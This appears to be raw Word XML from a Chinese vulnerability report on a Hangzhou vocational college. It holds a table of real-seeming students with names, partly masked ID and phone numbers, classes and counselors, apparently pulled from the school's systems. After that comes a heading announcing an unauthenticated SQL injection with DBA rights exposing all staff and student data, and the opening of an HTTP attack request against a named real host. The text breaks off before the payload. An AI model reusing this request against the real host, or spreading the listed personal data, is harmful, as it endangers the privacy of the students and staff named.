        <w:tblPrEx/>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FF9CD26">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="41" w:name="udea264d4"/>
          <w:bookmarkEnd w:id="40"/>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D4003AC">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="422"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>马鑫怡</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="42" w:name="u34f30e6f"/>
          <w:bookmarkEnd w:id="41"/>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BD9A14B">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>330185</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>0724</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="43" w:name="u8a0c9e02"/>
          <w:bookmarkEnd w:id="42"/>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70DA2D9">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2025</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2024</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="44" w:name="u604ffe02"/>
          <w:bookmarkEnd w:id="43"/>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12D2831">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>杭州市临安区</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="45" w:name="u30fe60de"/>
          <w:bookmarkEnd w:id="44"/>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C6B8C9C">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>中药251</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="46" w:name="udbf4c676"/>
          <w:bookmarkEnd w:id="45"/>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4FE07FB">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>医药健康学院</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="47" w:name="ua4abf9cb"/>
          <w:bookmarkEnd w:id="46"/>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084D5D1">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>邵淑媛</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="47"/>
        </w:tc>
      </w:tr>
      <w:bookmarkStart w:id="48" w:name="ue5f1d946"/>
      <w:tr w14:paraId="1955AFAD">
        <w:tblPrEx/>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AF38619">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="49" w:name="u0bd9c3db"/>
          <w:bookmarkEnd w:id="48"/>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B6C1E16">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="422"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>夏臻楠</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="50" w:name="u0e0345fc"/>
          <w:bookmarkEnd w:id="49"/>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DCB03E4">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>330185</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>0718</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="51" w:name="u82cb7f10"/>
          <w:bookmarkEnd w:id="50"/>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06109C3">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2025</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2036</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="52" w:name="u7979a688"/>
          <w:bookmarkEnd w:id="51"/>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5C03FB4">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>杭州市临安区</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="53" w:name="ue0ce8d58"/>
          <w:bookmarkEnd w:id="52"/>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B58A945">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>中药251</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="54" w:name="u3375aaca"/>
          <w:bookmarkEnd w:id="53"/>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3627D7A">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>医药健康学院</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="55" w:name="u3c6d8564"/>
          <w:bookmarkEnd w:id="54"/>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474A11D">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>邵淑媛</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="55"/>
        </w:tc>
      </w:tr>
      <w:bookmarkStart w:id="56" w:name="u813e7427"/>
      <w:tr w14:paraId="628432BF">
        <w:tblPrEx/>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7414709">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="57" w:name="u211a799b"/>
          <w:bookmarkEnd w:id="56"/>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E4EC6CF">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="422"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>孙雨沁</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="58" w:name="uef843d1a"/>
          <w:bookmarkEnd w:id="57"/>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F2DE949">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>330108</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>0960</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="59" w:name="uf777aae2"/>
          <w:bookmarkEnd w:id="58"/>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F5B798C">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2024</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>3134</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="60" w:name="udb41f4eb"/>
          <w:bookmarkEnd w:id="59"/>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352DC81">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>杭州市滨江区</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="61" w:name="u64f8da2b"/>
          <w:bookmarkEnd w:id="60"/>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4CE22963">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>园林设计241</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="62" w:name="u46f0aeba"/>
          <w:bookmarkEnd w:id="61"/>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B5AA3CB">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>生态园林学院</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="63" w:name="u57df604e"/>
          <w:bookmarkEnd w:id="62"/>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F4A5AA4">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>王亚楠</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="63"/>
        </w:tc>
      </w:tr>
      <w:bookmarkStart w:id="64" w:name="uc71c455b"/>
      <w:tr w14:paraId="34032C60">
        <w:tblPrEx/>
        <w:trPr>
          <w:trHeight w:val="495" w:hRule="atLeast"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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49BBC41">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="65" w:name="u5bc9a3ac"/>
          <w:bookmarkEnd w:id="64"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="140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591CE8C">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="422"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>周子杰</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="66" w:name="ue0f5904c"/>
          <w:bookmarkEnd w:id="65"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383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5ADAEE5">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>330102</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="fafafa"/>
              </w:rPr>
              <w:t>0011</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="67" w:name="u09a9c5a3"/>
          <w:bookmarkEnd w:id="66"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884"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31B5F76">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2026</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>3154</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="68" w:name="u84d7afa6"/>
          <w:bookmarkEnd w:id="67"/>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C29E44C">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>杭州市上城区</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="69" w:name="ub96fab69"/>
          <w:bookmarkEnd w:id="68"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449"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E27F474">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>西餐运营264</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="70" w:name="ub9bde8b3"/>
          <w:bookmarkEnd w:id="69"/>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DD9CC80">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>餐饮休闲学院</w:t>
            </w:r>
          </w:p>
          <w:bookmarkStart w:id="71" w:name="u4096b55d"/>
          <w:bookmarkEnd w:id="70"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="140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787137C">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
                <w:color w:val="0f1115"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>沈晓兰</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="71"/>
        </w:tc>
      </w:tr>
      <w:bookmarkStart w:id="72" w:name="j1LhX"/>
      <w:bookmarkEnd w:id="24"/>
    </w:tbl>
    <w:p w14:paraId="78CA3EC8">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>成果3 未授权报错SQL注入+dba权限+全校师生信息</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="73" w:name="C1dKo"/>
    <w:bookmarkEnd w:id="72"/>
    <w:p w14:paraId="01D76BAE">
      <w:pPr>
        <w:pStyle w:val="style4115"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="000000"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="000000"/>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="f2f2f2"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="50" w:lineRule="auto" w:line="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /prod-api/auth/register HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Host: web.hzdyjsxy.cn:18080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>clientid: e5cd7e4891bf95d1d19206ce24a7b32e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Content-Length: 219</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
